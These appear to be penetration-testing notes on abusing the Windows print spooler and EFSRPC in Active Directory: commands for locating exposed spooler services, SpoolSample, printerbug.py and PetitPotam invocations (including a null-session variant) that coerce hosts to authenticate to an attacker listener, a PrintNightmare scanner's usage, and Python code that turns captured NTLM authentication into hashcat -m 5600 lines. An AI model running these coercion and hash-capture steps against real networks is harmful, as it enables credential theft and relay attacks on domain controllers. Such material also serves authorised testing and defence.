Spooler Service

WIP

Finding Spooler Services

# https://book.hacktricks.xyz/windows/active-directory-methodology/printers-spooler-service-abuse

# Finding Windows Servers on the domain (excludes Server 2016; -notlike needs wildcards, a bare "2016" only matches that exact string)
# -ExpandProperty writes bare hostnames; ft output adds blank lines and padding that break the loop below
Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "*2016*") -and (Enabled -eq "True")} -Properties OperatingSystem | Select-Object -ExpandProperty Name | Set-Content servers.txt

# Finding Spooler services listening (Get-SpoolStatus tests whether \\<host>\pipe\spoolss answers)
# https://github.com/NotMedic/NetNTLMtoSilverTicket
. .\Get-SpoolStatus.ps1    # dot-source it so the Get-SpoolStatus function is loaded into the current scope
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}

# Or on Linux, via the endpoint mapper (TCP/135) with impacket's rpcdump.py. The "[MS-RPRN]" annotation comes from
# impacket's UUID table; grepping the interface UUID 12345678-1234-ABCD-EF00-0123456789AB works too, and -A 6 shows the bindings
rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep -A 6 MS-RPRN
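When sweeping a whole servers.txt the grep gets unwieldy, so the following is an added example (not from the original notes, nor from impacket) that parses rpcdump.py's output block by block and matches on interface UUIDs instead of the annotation. dump_host() assumes rpcdump.py is on PATH; SAMPLE is constructed output in rpcdump's layout, not a real capture. The MS-EFSR UUIDs are included for completeness, but EFSRPC is reached over named pipes directly and need not be registered with the endpoint mapper, so their absence says nothing about PetitPotam.

```python
"""Sweep rpcdump.py output for hosts that register the print spooler interface (MS-RPRN).

Added example, not code from the page or from impacket. It parses the block
layout rpcdump.py prints (Protocol / Provider / UUID / Bindings, blocks separated
by a blank line) and matches on interface UUIDs rather than on the "[MS-RPRN]"
annotation, which only appears when impacket knows the UUID. dump_host() assumes
rpcdump.py is on PATH; SAMPLE below is constructed output, not a real capture.
"""
import re
import subprocess

# Interface UUIDs worth spotting (lower-case for comparison).
INTERESTING = {
    "12345678-1234-abcd-ef00-0123456789ab": "MS-RPRN (spoolss: PrinterBug / PrintNightmare surface)",
    "c681d488-d850-11d0-8c52-00c04fd90f7e": "MS-EFSR efsrpc interface (PetitPotam surface)",
    "df1941c5-fe89-4e79-bf10-463657acf44d": "MS-EFSR lsarpc interface (PetitPotam surface)",
}
RPRN_UUID = "12345678-1234-abcd-ef00-0123456789ab"

UUID_RE = re.compile(r"^UUID\s*:\s*([0-9a-fA-F-]{36})\s+v([\d.]+)", re.M)
NP_RE = re.compile(r"ncacn_np:\\\\([^\[]+)\[\\pipe\\([^\]]+)\]")


def parse_rpcdump(text):
    """One dict per endpoint block: uuid (lower-case), version, protocol, provider, bindings."""
    entries = []
    for block in re.split(r"\n\s*\n", text.strip()):
        m = UUID_RE.search(block)
        if not m:
            continue                       # skip blocks with no UUID line
        proto = re.search(r"^Protocol:\s*(.*?)\s*$", block, re.M)
        prov = re.search(r"^Provider:\s*(.*?)\s*$", block, re.M)
        bindings = [ln.strip() for ln in block.splitlines()
                    if ln.strip().startswith(("ncacn_", "ncalrpc"))]
        entries.append({"uuid": m.group(1).lower(), "version": m.group(2),
                        "protocol": proto.group(1) if proto else "",
                        "provider": prov.group(1) if prov else "",
                        "bindings": bindings})
    return entries


def flag_interesting(entries):
    """Map each interesting UUID seen to its label, named-pipe bindings as (host, pipe) and all bindings."""
    hits = {}
    for e in entries:
        label = INTERESTING.get(e["uuid"])
        if not label:
            continue
        pipes = [(m.group(1), m.group(2)) for m in map(NP_RE.search, e["bindings"]) if m]
        hits[e["uuid"]] = {"label": label, "version": e["version"],
                           "pipes": pipes, "bindings": e["bindings"]}
    return hits


def spooler_exposed(text):
    """True when the endpoint mapper lists MS-RPRN, i.e. the spooler is running and registered."""
    return RPRN_UUID in flag_interesting(parse_rpcdump(text))


def dump_host(target, domain, user, password, timeout=60):
    """Run impacket's rpcdump.py (assumed on PATH) against one host and return its stdout."""
    proc = subprocess.run(["rpcdump.py", f"{domain}/{user}:{password}@{target}"],
                          capture_output=True, text=True, timeout=timeout)
    return proc.stdout


# Constructed sample in rpcdump.py's layout (not a real capture).
SAMPLE = r"""[*] Retrieving endpoint list from 10.0.0.5
Protocol: [MS-RPRN]: Print System Remote Protocol 
Provider: spoolsv.exe 
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0 
Bindings: 
          ncacn_ip_tcp:10.0.0.5[49669]
          ncalrpc:[LRPC-1a2b3c4d5e]
          ncacn_np:\\DC01[\pipe\spoolss]

Protocol: N/A 
Provider: N/A 
UUID    : 0A74EF1C-41A4-4E06-83AE-DC74FB1CDD53 v1.0 
Bindings: 
          ncacn_ip_tcp:10.0.0.5[49664]

"""

if __name__ == "__main__":
    import sys
    if len(sys.argv) == 5:                      # usage: spool_sweep.py servers.txt DOMAIN USER PASSWORD
        targets = [t.strip() for t in open(sys.argv[1]) if t.strip()]
        outputs = {t: dump_host(t, *sys.argv[2:5]) for t in targets}
    else:
        outputs = {"10.0.0.5": SAMPLE}
    for host, out in outputs.items():
        for hit in flag_interesting(parse_rpcdump(out)).values():
            print(f"{host}: {hit['label']} v{hit['version']} pipes={hit['pipes']}")
```

Without arguments it parses SAMPLE and reports the spoolss pipe on DC01; with servers.txt and credentials it runs rpcdump.py per host and prints only the hosts that register an interesting interface.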

MS-RPRN Abuse (Printer Bug)

https://www.thehacker.recipes/active-directory-domain-services/movement/mitm-and-coerced-authentications/ms-rprn

# Ask the service to authenticate against an arbitrary host: RpcRemoteFindFirstPrinterChangeNotificationEx tells the
# target's spooler to deliver change notifications to a machine of our choosing, so the target connects back over SMB
# and authenticates with its machine account (NTLM) to <RESPONDERIP>. Any domain user can call it; the target only
# needs a running spooler.
# Using SpoolSample (leechristensen/SpoolSample; a build is also bundled in https://github.com/NotMedic/NetNTLMtoSilverTicket)
SpoolSample.exe <TARGET> <RESPONDERIP>

# Using dementor.py (NotMedic/NetNTLMtoSilverTicket) or printerbug.py (dirkjanm/krbrelayx)
# <TARGET> is the Windows host whose spooler is abused, not a physical printer
python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
printerbug.py 'domain/username:password'@<TARGET> <RESPONDERIP>

MS-EFSRPC

# Really great doc
https://www.thehacker.recipes/active-directory-domain-services/movement/mitm-and-coerced-authentications/ms-efsr

# Can test for the interface UUID through MSF
# auxiliary/scanner/smb/pipe_dcerpc_auditor
# TODO

# PoC tool to coerce Windows hosts to authenticate to other machines
# via the MS-EFSRPC EfsRpcOpenFileRaw function (the file name argument is a UNC path pointing at the listener).
# Disabling the EFS service seems not to mitigate the "feature".
https://github.com/topotam/PetitPotam

$ ./PetitPotam.py -d domain.com -u myuser -p mypass <attacker_ip> <target>

# Seems possible to use NULL sessions on some domain controllers
# (Microsoft blocked the unauthenticated path in the August 2021 updates, CVE-2021-36942; unpatched DCs still answer,
# and later versions of the tool fall back to other EFSRPC methods such as EfsRpcEncryptFileSrv)
# TEST
$ ./PetitPotam.py -d '' -u '' -p '' <attacker_ip> <target>
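What the listener at <RESPONDERIP> / <attacker_ip> actually receives, whether the coercion came from MS-RPRN above or from PetitPotam here, is an NTLMSSP AUTHENTICATE_MESSAGE from the target's machine account. The following is an added example (not code from the page, Responder or impacket) that pulls the NetNTLMv2 response out of such a message and formats it the way Responder logs it for hashcat -m 5600, then inspects the AV_PAIRs for the relay mitigations the client advertised. The Type 3 blob it parses is constructed by build_authenticate() so the script runs offline; the NTProofStr in the sample is a placeholder, and the server challenge is assumed to be Responder's default 1122334455667788.

```python
"""Parse a captured NTLMSSP AUTHENTICATE_MESSAGE (Type 3) and emit a hashcat -m 5600 line.

Added example, not code from the page, Responder or impacket. Layouts follow
MS-NLMP (AUTHENTICATE_MESSAGE 2.2.1.3, NTLMv2_RESPONSE 2.2.2.8). The message is
constructed by build_authenticate() so the script runs offline; in practice the
bytes come from the SMB/HTTP listener the coercion was pointed at, and the
server challenge is the one that listener sent in its CHALLENGE_MESSAGE.
"""
import struct
from datetime import datetime, timedelta, timezone

SIGNATURE = b"NTLMSSP\x00"
NEGOTIATE_UNICODE = 0x00000001
AV_IDS = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName", 4: "DnsDomainName",
          6: "Flags", 7: "Timestamp", 9: "TargetName", 10: "ChannelBindings"}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def build_ntlmv2_response(ntproofstr, timestamp, client_challenge, av_pairs):
    """NTLMv2_RESPONSE = NTProofStr || NTLMv2_CLIENT_CHALLENGE (used here to construct sample data)."""
    av = b"".join(struct.pack("<HH", avid, len(val)) + val for avid, val in av_pairs)
    av += struct.pack("<HH", 0, 0)                               # MsvAvEOL
    return (ntproofstr + b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + av + b"\x00" * 4)


def build_authenticate(domain, user, workstation, nt_response, lm_response=b"\x00" * 24):
    """Constructed AUTHENTICATE_MESSAGE: UTF-16LE strings, 88-byte header (Version and MIC present)."""
    header_len, payload, fields = 88, bytearray(), []
    for data in (lm_response, nt_response, domain.encode("utf-16-le"),
                 user.encode("utf-16-le"), workstation.encode("utf-16-le"), b""):
        fields.append(struct.pack("<HHI", len(data), len(data), header_len + len(payload)))
        payload += data
    flags = NEGOTIATE_UNICODE | 0x00000200 | 0x00080000 | 0x20000000   # UNICODE, NTLM, EXTENDED_SESSIONSECURITY, 128
    version = bytes([10, 0]) + struct.pack("<H", 19041) + b"\x00\x00\x00\x0f"
    return (SIGNATURE + struct.pack("<I", 3) + b"".join(fields) + struct.pack("<I", flags)
            + version + b"\x00" * 16 + bytes(payload))


def _field(msg, off):
    """Resolve a (Len, MaxLen, Offset) field; Offset is relative to the start of the message."""
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, off)
    return msg[offset:offset + length]


def parse_authenticate(msg):
    """Pull the strings and both responses out of a Type 3 message."""
    if msg[:8] != SIGNATURE or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLMSSP AUTHENTICATE_MESSAGE")
    flags = struct.unpack_from("<I", msg, 60)[0]
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "latin-1"   # OEM code page simplified to latin-1
    return {"lm_response": _field(msg, 12), "nt_response": _field(msg, 20),
            "domain": _field(msg, 28).decode(enc), "user": _field(msg, 36).decode(enc),
            "workstation": _field(msg, 44).decode(enc), "flags": flags}


def is_ntlmv2(nt_response):
    """A 24-byte NtChallengeResponse is NTLMv1 (hashcat -m 5500); anything longer carries the NTLMv2 blob."""
    return len(nt_response) > 24


def parse_ntlmv2_blob(blob):
    """Split NTLMv2_CLIENT_CHALLENGE into (timestamp as datetime, client challenge, AV_PAIR dict)."""
    timestamp, client_challenge = struct.unpack_from("<Q8s", blob, 8)
    av, off = {}, 28
    while True:
        avid, avlen = struct.unpack_from("<HH", blob, off)
        off += 4
        if avid == 0:
            break
        av[AV_IDS.get(avid, avid)] = blob[off:off + avlen]
        off += avlen
    return FILETIME_EPOCH + timedelta(microseconds=timestamp // 10), client_challenge, av


def to_hashcat_5600(auth, server_challenge):
    """USER::DOMAIN:SERVERCHALLENGE:NTPROOFSTR:BLOB, the NetNTLMv2 line Responder logs and hashcat -m 5600 takes."""
    nt = auth["nt_response"]
    if not is_ntlmv2(nt):
        raise ValueError("NTLMv1 response, use hashcat -m 5500 instead")
    return "%s::%s:%s:%s:%s" % (auth["user"], auth["domain"], server_challenge.hex(), nt[:16].hex(), nt[16:].hex())


def relay_hints(av):
    """Relay mitigations the client advertised: MIC flag, SPN in MsvAvTargetName, channel bindings."""
    flags = struct.unpack("<I", av["Flags"])[0] if "Flags" in av else 0
    return {"mic": bool(flags & 0x2), "target_spn": av.get("TargetName", b"").decode("utf-16-le"),
            "channel_bindings": "ChannelBindings" in av}


# Constructed sample: a coerced DC01$ logon to a rogue SMB listener at 10.0.0.99 (not a real capture).
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")   # Responder's default challenge (assumption)
SAMPLE_BLOB = build_ntlmv2_response(
    ntproofstr=bytes(range(16)),                       # placeholder; real value is HMAC-MD5(NTOWFv2, challenge || blob)
    timestamp=132_800_000_000_000_000,                 # FILETIME, 100 ns ticks since 1601
    client_challenge=bytes.fromhex("a1a2a3a4a5a6a7a8"),
    av_pairs=[(2, "LAB".encode("utf-16-le")), (1, "DC01".encode("utf-16-le")),
              (4, "lab.local".encode("utf-16-le")), (6, struct.pack("<I", 0x2)),
              (9, "cifs/10.0.0.99".encode("utf-16-le"))])
SAMPLE_TYPE3 = build_authenticate("LAB", "DC01$", "DC01", SAMPLE_BLOB)

if __name__ == "__main__":
    auth = parse_authenticate(SAMPLE_TYPE3)
    when, _cc, av = parse_ntlmv2_blob(auth["nt_response"][16:])
    print(to_hashcat_5600(auth, SERVER_CHALLENGE))
    print("timestamp:", when.isoformat(), "relay hints:", relay_hints(av))
```

The relay_hints() output is the part worth reading before pointing the capture at ntlmrelayx: a MIC flag, a cifs/ SPN in MsvAvTargetName and channel bindings are exactly what stops the coerced authentication from being relayed to another service, while the machine-account NetNTLMv2 line itself is not crackable in practice.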

PrintNightmare (CVE-2021-34527)

# Python Scanner
https://github.com/byt3bl33d3r/ItWasAllADream

usage: itwasalladream [-h] -u USERNAME [-p PASSWORD] -d DOMAIN [--timeout TIMEOUT] [--threads THREADS] [-v] [--csv-column CSV_COLUMN] target

PrintNightmare (CVE-2021-34527) scanner

positional arguments:
  target                Target subnet in CIDR notation, CSV file or newline-delimited text file

optional arguments:
  -h, --help            show this help message and exit
  -u USERNAME, --username USERNAME
                        username to authenticate as (default: None)
  -p PASSWORD, --password PASSWORD
                        password to authenticate as. If not specified will prompt. (default: None)
  -d DOMAIN, --domain DOMAIN
                        domain to authenticate as (default: None)
  --timeout TIMEOUT     Connection timeout in seconds (default: 30)
  --threads THREADS     Max concurrent threads (default: 100)
  -v, --verbose         Enable verbose output (default: False)
  --csv-column CSV_COLUMN
                        If target argument is a CSV file, this argument specifies which column to parse (default: DNSHostName)